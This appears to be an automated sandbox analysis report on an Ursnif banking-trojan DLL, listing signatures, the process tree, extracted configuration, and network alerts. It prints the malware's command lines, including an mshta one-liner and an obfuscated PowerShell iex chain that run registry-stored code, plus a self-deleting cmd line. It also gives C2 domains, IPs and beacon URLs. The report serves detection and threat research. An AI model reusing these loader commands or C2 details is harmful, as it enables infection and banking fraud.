Windows Analysis Report
lokvQRcUe0

Overview

General Information

Sample Name:lokvQRcUe0 (renamed file extension from none to dll)
Analysis ID:634419
MD5:5de5e3440620950f0be99fc6728c7afe
SHA1:43cbdfe6773ce518847b89f177a555e6bece283b
SHA256:2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139
Tags:dllgozi_ifsb

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6352 cmdline: loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6360 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6380 cmdline: rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 2388 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6356 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6644 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5580 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings
00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.4d994a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.4d994a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.rundll32.exe.4a10000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.543a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.54e6b48.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

No Sigma rule has matched
Timestamp:05/26/22-04:06:31.790854
Source IP:192.168.2.3
Destination IP:13.107.42.16
SID:2033203
Source Port:49743
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:05/26/22-04:06:53.058632
Source IP:192.168.2.3
Destination IP:176.10.119.68
SID:2033204
Source Port:49752
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:05/26/22-04:06:53.058632
Source IP:192.168.2.3
Destination IP:176.10.119.68
SID:2033203
Source Port:49752
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

                      AV Detection

                      Source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Source: lokvQRcUe0.dllReversingLabs: Detection: 48%
                      Source: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/Avira URL Cloud: Label: phishing
                      Source: lokvQRcUe0.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A15FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04A15FBB
                      Source: lokvQRcUe0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.249261559.000000000040D000.00000002.00000001.01000000.00000003.sdmp, lokvQRcUe0.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_04F665C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_04F699BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_04F7BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_04F6FD47

                      Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 176.10.119.68 80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49743 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 176.10.119.68:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 176.10.119.68:80
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/
                      Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/
                      Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZ
                      Source: rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/IYp4CCs722tF8/P1aXeQdj/KbUVHJxkmyFlZHZ2qCybZpu/FgU09Slqdm/iq8FwKnV
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: explorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A11CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_04A11CA5
                      Source: global trafficHTTP traffic detected: GET /drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
